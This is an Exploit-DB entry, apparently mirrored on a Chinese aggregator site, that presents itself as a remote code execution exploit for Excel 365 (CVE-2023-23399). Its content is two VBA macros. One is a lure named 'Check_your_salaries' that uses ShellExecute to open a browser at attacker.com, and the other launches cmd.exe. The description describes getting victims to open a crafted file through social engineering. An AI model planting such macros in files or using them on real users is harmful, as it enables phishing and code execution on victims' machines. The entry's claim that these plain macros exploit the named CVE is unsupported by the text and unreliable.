Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit – Remote Code Execution (RCE)

  • 作者: nu11secur1ty
    日期: 2023-04-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51328/
  • ## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)
    ## Exploit Author: nu11secur1ty
    ## Date: 03.16.2023
    ## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel
    ## Software: https://www.microsoft.com/en-us/microsoft-365/excel
    ## Reference: https://www.invicti.com/learn/remote-code-execution-rce/
    ## CVE ID: CVE-2023-23399
    
    ## Description:
    The malicious user can exploit the victim's PC remotely.
    For example, when the score indicates that the Attack Vector is Local
    and User Interaction is Required, this could describe an exploit in
    which an attacker, through social engineering, convinces a victim to
    download and open a specially crafted file from a website which leads
    to a local attack on their computer.
    
    STATUS: HIGH Vulnerability
    
    [+]Exploit0:
    ```
    Sub Check_your_salaries()
    CreateObject("Shell.Application").ShellExecute
    "microsoft-edge:https://attacker.com"
    End Sub
    ```
    [+]Exploit1:
    ```
    Sub cmd()
    Dim Program As String
    Dim TaskID As Double
    On Error Resume Next
    Program = "cmd.exe"
    TaskID = Shell(Program, 1)
    If Err <> 0 Then
    MsgBox "Can't start " & Program
    End If
    End Sub
    ```
    
    ## Reproduce:
    [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399)
    
    ## Proof and Exploit:
    [href](https://streamable.com/dnyfx0)
    
    ## Time spend:
    03:00:00
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at
    https://packetstormsecurity.com/https://cve.mitre.org/index.html and
    https://www.exploit-db.com/
    home page: https://www.nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <http://nu11secur1ty.com/>